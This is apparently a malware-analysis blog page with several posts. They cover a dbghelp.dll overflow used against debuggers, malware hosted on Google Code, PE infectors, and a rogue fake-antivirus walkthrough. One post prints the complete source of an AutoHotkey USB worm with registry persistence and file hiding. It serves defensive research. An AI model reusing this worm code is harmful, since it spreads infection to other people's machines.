Computer Forensics

As an addition to the method of finding the presence of Debuggers and Virtual environment, exploiting the debugging tools have started. Recently we came across a new variant of BKDR.IRCBot was found to perform such a trick of exploiting this unexplored vulnerability existing in the LoadExportSymbols() function of dbghelp.dll. This vulnerability causes Olly Debugger (or any other debugger) using this unfixed version of DLL to crash or execute remote code while they load such crafted executables or DLL’s.

When any debugger tries to load the executable, it crashes without any error or crash report. This being a suspicious behavior of anti-debugging, took made me to analyze the file further. Prior to loading in debugger, I noted the file to contain TLS table entry with a TLS Callback function registered with it. I started looking for other simple documented anti-debugging tricks, but could not find any. This is where we sensed that malware is challenging with some out-of-ordinary anti-debugging tricks.

On further analysis of the file’s structure values like Data Directory entries, Import Table entries and its corresponding API’s imported, Export Table, etc. For an executable, existence an export table made me suspicious. It had one export function with very long random bytes. Upon parsing the file in Hex Editor I could conclude the export table function name is 0xC1C bytes long. Now, what does this long name had to do with the crash of a debugger?

Further analysis of the crash narrowed me down to the crash at dbghelp.dll one of the libraries imported by any debugger. The function LoadExportSymbols() was the place where the execution crashes. Further analysis at this module helped me sense that this function will not check the length of the export name string being copied from the buffer to the stack and hence causing buffer overflow in the module. This can better be understood from the illustration below.

In the fig, we could see that at the memory location 0x6D529AFF, the export table name data is being copied from buffer to the stack. The buffer can be seen in the dump screen at offset 0x01E72613, and the corresponding data being moved to the stack at 0x0012A491. A normal scenario which can be found in any buffer overflow vulnerability.

If someone has not updated their toolset or dbghelp.dll in the Olly directory in this case or in any applications where one uses this DLL, this method can be used as a simple anti-debugging technique.

Malware writers find various places to store their malware so that they can use that location hard-coded in their downloaders they distribute and can change their original payload with different files so that they can infect efficiently with different executables and can be left un-detected. Googlecode have become one such location where malware writers can have a repository of such executables and can modify when necessary. Check the screenshot below which states one such example.

Most of the files are executable files along with archived “.rar” files. The time stamps show that the files have been uploaded over the course of the last coupe of months. The download count also suggests the count of people in who maybe infected. This suggests that an Trojan-Downloader is actively using this free service to spread malware.

All the malware has to do is just use the HTTP get requests to download the file and execute it in the victim’s machine.

Another code page is displayed below.

The advantage the malware have here is that these sites are not blocked by any firewalls or Internet security suite and hence can bypass that level of protection. As Google Code is free hosting website for developers, attackers are taking advantage of the service to push their malware.

Abstract

File Infector type viruses modify the code in any frequently used legitimate files in such a way that they can be up before your original application’s process starts. Malwares can achieve this by modifying or inserting the malicious code into any legitimate files in such a way that it can be persistent to the system even after shutdown. This information is of importance for a forensic analyst to assess the ways havoc has been caused in case of a malware infection. This paper will discuss these topics starting from Introduction to PE Files, Different types of PE infectors, classification on the basis of infection, their behavior, with examples.

My work experience of above 3 years as senior threat research analyst with “Comodo antivirus” enhanced me with lots of ideas, concepts, and kept me up to date with the latest malware and their the infection methodologies. I came up with this topic to share my experiences of my research on this topic since has been an area of limited research since it needs a lot of understanding of both assembly language and windows internal architecture.

Read more on this paper available for free download Here

The AHK worm consists of 3 files along with the AHK compiler executable, consolidated as an archive, svchost.exe.

1. Contents of reproduce.txt

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{

         FileCopydir,C:\heap41a\offspring,%element%:\,1
}

   }

}

regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon

ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt

Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt

return

2. Conrtents of script.txt


#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

3. Contents of “std.txt”

#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

4. Contents of “drivelist.txt”

c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z

We use Google search for every instance in our life, it may be from gardening to university study to keeping ourselves updated. How about a search to get some details on the recent Iceland volcanic activity, and it leading to malware!! Dangerous isn’t it!! But this occasionally occurs!! We need to be careful with our sites we visit from Google search results. Google is taking the maximum efforts to reduce the search results going bad! But still we need to be careful of.

Today morning, while casually searching in Google for the recent updates on the volcanic activity in my opera browser, led me to a fantasy! A Message-box saying “Warning! Your computer is at risk of malware attacks”. Was happy! I caught a rogue, Fake-Alert. I thought of investigating it. Moved the message box sideways and found my Browser minimized under it. I have attached the screen-shot below in Firefox!

A message box prompting me that “Warning! Your system is at risk of malware attacks” and they assure that they will help me in strengthening my system. I was panicked. I agreed to its request by clicking OK to it. It then opened the Firefox window and started scanning my system. It even displayed my IP address and my system environment parameters.

After the scanning is complete, it started alerting me that my system has a lot of problems and need to be fixed. Check the screenshot below. The problems reported were 1. registry to be fixed, 2. Remove outdated temporary junk files, 3. Hard disk Defragmentation, 4. Disk surface analysis, 5. Webpage download speed.

I clicked the message box and it prompted me to download and save the file named “packupdate_build30_287.exe”, and i did so. The MD5 of the file is

MD5:   9d44165fa043a2f9674055055233598e
SHA-1: f9e69be0459c57d187e786ff30a7609b2b6edcf0

Now, I let the file execute. It started extracting.

After extracting a system scan started.

Finally,

My system is infected now!! Now panic at the extreme!! Wanting to fix it, clicked on “remove all”. It was kind to open a window asking me to buy the protection for 6 months (65.00$) or 1 year (100.00$).
Should I buy?

No, without any doubts. I know that I have executed the file in a clean built WinXP SP2 Virtual Machine test environment in non-persistent mode and there is no chance of it getting infected.